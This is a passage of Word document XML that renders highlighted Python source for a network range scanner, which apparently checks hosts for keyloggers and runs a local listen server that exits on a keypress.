        <w:t>listen_server_instance</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s31"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s11"/>
        </w:rPr>
        <w:t>start</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s31"/>
        </w:rPr>
        <w:t>()</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D566BA" w:rsidRDefault="00D566BA">
      <w:pPr>
        <w:pStyle w:val="HTMLconformatoprevio"/>
        <w:divId w:val="120079336"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ln1"/>
        </w:rPr>
        <w:t xml:space="preserve">356  </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">            </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s11"/>
        </w:rPr>
        <w:t xml:space="preserve">listen_server_enabled </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s21"/>
        </w:rPr>
        <w:t>= True</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D566BA" w:rsidRDefault="00D566BA">
      <w:pPr>
        <w:pStyle w:val="HTMLconformatoprevio"/>
        <w:divId w:val="120079336"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ln1"/>
        </w:rPr>
        <w:t xml:space="preserve">357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358  </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">            </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s11"/>
        </w:rPr>
        <w:t>print</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s31"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s41"/>
        </w:rPr>
        <w:t>'Error starting Server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359  </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">            </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s11"/>
        </w:rPr>
        <w:t>sys</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s31"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s11"/>
        </w:rPr>
        <w:t>exit</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s31"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s61"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s31"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D566BA" w:rsidRDefault="00D566BA">
      <w:pPr>
        <w:pStyle w:val="HTMLconformatoprevio"/>
        <w:divId w:val="120079336"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ln1"/>
        </w:rPr>
        <w:t xml:space="preserve">360  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D566BA" w:rsidRDefault="00D566BA">
      <w:pPr>
        <w:pStyle w:val="HTMLconformatoprevio"/>
        <w:divId w:val="120079336"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ln1"/>
        </w:rPr>
        <w:t xml:space="preserve">361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62  </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s11"/>
        </w:rPr>
        <w:t>print</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s31"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s41"/>
        </w:rPr>
        <w:t xml:space="preserve">'This Host %s : IP local %s : IP wan %s' </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s21"/>
        </w:rPr>
        <w:t xml:space="preserve">% </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s31"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s11"/>
        </w:rPr>
        <w:t>hostname</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s31"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s11"/>
        </w:rPr>
        <w:t>localip</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s31"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s11"/>
        </w:rPr>
        <w:t>externalip</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s31"/>
        </w:rPr>
        <w:t>))</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D566BA" w:rsidRDefault="00D566BA">
      <w:pPr>
        <w:pStyle w:val="HTMLconformatoprevio"/>
        <w:divId w:val="120079336"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ln1"/>
        </w:rPr>
        <w:t xml:space="preserve">363  </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s11"/>
        </w:rPr>
        <w:t>print</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s31"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s41"/>
        </w:rPr>
        <w:t>'Scanning ...'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s31"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D566BA" w:rsidRDefault="00D566BA">
      <w:pPr>
        <w:pStyle w:val="HTMLconformatoprevio"/>
        <w:divId w:val="120079336"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ln1"/>
        </w:rPr>
        <w:t xml:space="preserve">364  </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s11"/>
        </w:rPr>
        <w:t xml:space="preserve">start </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s21"/>
        </w:rPr>
        <w:t xml:space="preserve">= </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s11"/>
        </w:rPr>
        <w:t>time</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s31"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s11"/>
        </w:rPr>
        <w:t>perf_counter</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s31"/>
        </w:rPr>
        <w:t>()</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D566BA" w:rsidRDefault="00D566BA">
      <w:pPr>
        <w:pStyle w:val="HTMLconformatoprevio"/>
        <w:divId w:val="120079336"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ln1"/>
        </w:rPr>
        <w:t xml:space="preserve">365  </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s11"/>
        </w:rPr>
        <w:t xml:space="preserve">scanner </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s21"/>
        </w:rPr>
        <w:t xml:space="preserve">= </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s11"/>
        </w:rPr>
        <w:t>RangeScan</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s31"/>
        </w:rPr>
        <w:t>(</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p>
    <w:p w:rsidR="00D566BA" w:rsidRDefault="00D566BA">
      <w:pPr>
        <w:pStyle w:val="HTMLconformatoprevio"/>
        <w:divId w:val="120079336"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ln1"/>
        </w:rPr>
        <w:t xml:space="preserve">366  </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s11"/>
        </w:rPr>
        <w:t>scanner</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s31"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s11"/>
        </w:rPr>
        <w:t>start</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s31"/>
        </w:rPr>
        <w:t>()</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D566BA" w:rsidRDefault="00D566BA">
      <w:pPr>
        <w:pStyle w:val="HTMLconformatoprevio"/>
        <w:divId w:val="120079336"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ln1"/>
        </w:rPr>
        <w:t xml:space="preserve">367  </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s11"/>
        </w:rPr>
        <w:t xml:space="preserve">total_hosts </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s21"/>
        </w:rPr>
        <w:t xml:space="preserve">= </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s11"/>
        </w:rPr>
        <w:t>scanner</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s31"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s11"/>
        </w:rPr>
        <w:t>hosts_scanned</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D566BA" w:rsidRDefault="00D566BA">
      <w:pPr>
        <w:pStyle w:val="HTMLconformatoprevio"/>
        <w:divId w:val="120079336"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ln1"/>
        </w:rPr>
        <w:t xml:space="preserve">368  </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s11"/>
        </w:rPr>
        <w:t xml:space="preserve">total_time </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s21"/>
        </w:rPr>
        <w:t xml:space="preserve">= </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s11"/>
        </w:rPr>
        <w:t>time</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s31"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s11"/>
        </w:rPr>
        <w:t>perf_counter</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s31"/>
        </w:rPr>
        <w:t xml:space="preserve">() </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s21"/>
        </w:rPr>
        <w:t xml:space="preserve">- </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s11"/>
        </w:rPr>
        <w:t>start</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D566BA" w:rsidRDefault="00D566BA">
      <w:pPr>
        <w:pStyle w:val="HTMLconformatoprevio"/>
        <w:divId w:val="120079336"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ln1"/>
        </w:rPr>
        <w:t xml:space="preserve">369  </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s11"/>
        </w:rPr>
        <w:t>print</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s31"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s41"/>
        </w:rPr>
        <w:t xml:space="preserve">'Scanned %d hosts at %s in %6.2f seconds ' </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s21"/>
        </w:rPr>
        <w:t xml:space="preserve">% </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s31"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s11"/>
        </w:rPr>
        <w:t>total_hosts</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s31"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s11"/>
        </w:rPr>
        <w:t>args</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s31"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s11"/>
        </w:rPr>
        <w:t>range</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s31"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s11"/>
        </w:rPr>
        <w:t>total_time</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s31"/>
        </w:rPr>
        <w:t>))</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D566BA" w:rsidRDefault="00D566BA">
      <w:pPr>
        <w:pStyle w:val="HTMLconformatoprevio"/>
        <w:divId w:val="120079336"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ln1"/>
        </w:rPr>
        <w:t xml:space="preserve">370  </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s11"/>
        </w:rPr>
        <w:t>print</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s31"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s41"/>
        </w:rPr>
        <w:t xml:space="preserve">'Total %d threads launched, and max simultaneous was %d threads' </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s21"/>
        </w:rPr>
        <w:t xml:space="preserve">% </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s31"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s11"/>
        </w:rPr>
        <w:t>total_threads_launched</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s31"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s11"/>
        </w:rPr>
        <w:t>max_concurrent_threads</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s31"/>
        </w:rPr>
        <w:t>))</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D566BA" w:rsidRDefault="00D566BA">
      <w:pPr>
        <w:pStyle w:val="HTMLconformatoprevio"/>
        <w:divId w:val="120079336"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ln1"/>
        </w:rPr>
        <w:t xml:space="preserve">371  </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s21"/>
        </w:rPr>
        <w:t xml:space="preserve">if </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s11"/>
        </w:rPr>
        <w:t xml:space="preserve">total_current_threads_running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372  </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s11"/>
        </w:rPr>
        <w:t>print</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s31"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s41"/>
        </w:rPr>
        <w:t xml:space="preserve">'Something strange happes because the threads running is %d ' </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s21"/>
        </w:rPr>
        <w:t xml:space="preserve">% </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s31"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s11"/>
        </w:rPr>
        <w:t>total_current_threads_running</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s31"/>
        </w:rPr>
        <w:t>))</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D566BA" w:rsidRDefault="00D566BA">
      <w:pPr>
        <w:pStyle w:val="HTMLconformatoprevio"/>
        <w:divId w:val="120079336"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ln1"/>
        </w:rPr>
        <w:t xml:space="preserve">373  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D566BA" w:rsidRDefault="00D566BA">
      <w:pPr>
        <w:pStyle w:val="HTMLconformatoprevio"/>
        <w:divId w:val="120079336"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ln1"/>
        </w:rPr>
        <w:t xml:space="preserve">374  </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s01"/>
        </w:rPr>
        <w:t># No keylogger found</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D566BA" w:rsidRDefault="00D566BA">
      <w:pPr>
        <w:pStyle w:val="HTMLconformatoprevio"/>
        <w:divId w:val="120079336"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ln1"/>
        </w:rPr>
        <w:t xml:space="preserve">375  </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s21"/>
        </w:rPr>
        <w:t xml:space="preserve">if </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s11"/>
        </w:rPr>
        <w:t xml:space="preserve">enable_server </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s21"/>
        </w:rPr>
        <w:t xml:space="preserve">and </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s11"/>
        </w:rPr>
        <w:t xml:space="preserve">keyloggers_found </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s21"/>
        </w:rPr>
        <w:t>== False:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D566BA" w:rsidRDefault="00D566BA">
      <w:pPr>
        <w:pStyle w:val="HTMLconformatoprevio"/>
        <w:divId w:val="120079336"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ln1"/>
        </w:rPr>
        <w:t xml:space="preserve">376  </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s11"/>
        </w:rPr>
        <w:t>print</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s31"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s41"/>
        </w:rPr>
        <w:t>'No Keyloggers found. Disabling Server...'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s31"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D566BA" w:rsidRDefault="00D566BA">
      <w:pPr>
        <w:pStyle w:val="HTMLconformatoprevio"/>
        <w:divId w:val="120079336"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ln1"/>
        </w:rPr>
        <w:t xml:space="preserve">377  </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s11"/>
        </w:rPr>
        <w:t xml:space="preserve">enable_server </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s21"/>
        </w:rPr>
        <w:t>= False</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D566BA" w:rsidRDefault="00D566BA">
      <w:pPr>
        <w:pStyle w:val="HTMLconformatoprevio"/>
        <w:divId w:val="120079336"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ln1"/>
        </w:rPr>
        <w:t xml:space="preserve">378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79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80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81  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D566BA" w:rsidRDefault="00D566BA">
      <w:pPr>
        <w:pStyle w:val="HTMLconformatoprevio"/>
        <w:divId w:val="120079336"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ln1"/>
        </w:rPr>
        <w:t xml:space="preserve">382  </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s01"/>
        </w:rPr>
        <w:t># Listen Server</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D566BA" w:rsidRDefault="00D566BA">
      <w:pPr>
        <w:pStyle w:val="HTMLconformatoprevio"/>
        <w:divId w:val="120079336"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ln1"/>
        </w:rPr>
        <w:t xml:space="preserve">383  </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s21"/>
        </w:rPr>
        <w:t xml:space="preserve">while </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s11"/>
        </w:rPr>
        <w:t xml:space="preserve">enable_server </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s21"/>
        </w:rPr>
        <w:t xml:space="preserve">and </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s11"/>
        </w:rPr>
        <w:t>listen_server_enabled</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s21"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D566BA" w:rsidRDefault="00D566BA">
      <w:pPr>
        <w:pStyle w:val="HTMLconformatoprevio"/>
        <w:divId w:val="120079336"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ln1"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">384  </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s21"/>
        </w:rPr>
        <w:t xml:space="preserve">if </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s11"/>
        </w:rPr>
        <w:t xml:space="preserve">listen_server_instance </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s21"/>
        </w:rPr>
        <w:t>is not None:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D566BA" w:rsidRDefault="00D566BA">
      <w:pPr>
        <w:pStyle w:val="HTMLconformatoprevio"/>
        <w:divId w:val="120079336"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ln1"/>
        </w:rPr>
        <w:t xml:space="preserve">385  </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">            </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s11"/>
        </w:rPr>
        <w:t>print</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s31"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s41"/>
        </w:rPr>
        <w:t>'Socket is Listening at {}:{}...'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s31"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s11"/>
        </w:rPr>
        <w:t>format</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s31"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s11"/>
        </w:rPr>
        <w:t>hostname</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s31"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s11"/>
        </w:rPr>
        <w:t>server_port</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s31"/>
        </w:rPr>
        <w:t>))</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D566BA" w:rsidRDefault="00D566BA">
      <w:pPr>
        <w:pStyle w:val="HTMLconformatoprevio"/>
        <w:divId w:val="120079336"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ln1"/>
        </w:rPr>
        <w:t xml:space="preserve">386  </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">            </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s01"/>
        </w:rPr>
        <w:t># key = input('Enter "Q" o "q" to Exit : ').strip()</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D566BA" w:rsidRDefault="00D566BA">
      <w:pPr>
        <w:pStyle w:val="HTMLconformatoprevio"/>
        <w:divId w:val="120079336"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ln1"/>
        </w:rPr>
        <w:t xml:space="preserve">387  </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">            </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s11"/>
        </w:rPr>
        <w:t xml:space="preserve">key </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s21"/>
        </w:rPr>
        <w:t xml:space="preserve">= </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s11"/>
        </w:rPr>
        <w:t>msvcrt</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s31"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s11"/>
        </w:rPr>
        <w:t>getch</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s31"/>
        </w:rPr>
        <w:t>()</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D566BA" w:rsidRDefault="00D566BA">
      <w:pPr>
        <w:pStyle w:val="HTMLconformatoprevio"/>
        <w:divId w:val="120079336"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ln1"/>
        </w:rPr>
        <w:t xml:space="preserve">388  </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">            </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s21"/>
        </w:rPr>
        <w:t xml:space="preserve">if </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s11"/>
        </w:rPr>
        <w:t xml:space="preserve">key </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s21"/>
        </w:rPr>
        <w:t xml:space="preserve">== </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s51"/>
        </w:rPr>
        <w:t xml:space="preserve">b"Q" </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s21"/>
        </w:rPr>
        <w:t xml:space="preserve">or </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s11"/>
        </w:rPr>
        <w:t xml:space="preserve">key </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s21"/>
        </w:rPr>
        <w:t xml:space="preserve">== </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s51"/>
        </w:rPr>
        <w:t>b"q"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s21"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D566BA" w:rsidRDefault="00D566BA">
      <w:pPr>
        <w:pStyle w:val="HTMLconformatoprevio"/>
        <w:divId w:val="120079336"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ln1"/>
        </w:rPr>
        <w:t xml:space="preserve">389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90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91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92  </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">                </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s11"/>
        </w:rPr>
        <w:t>print</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s31"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s41"/>
        </w:rPr>
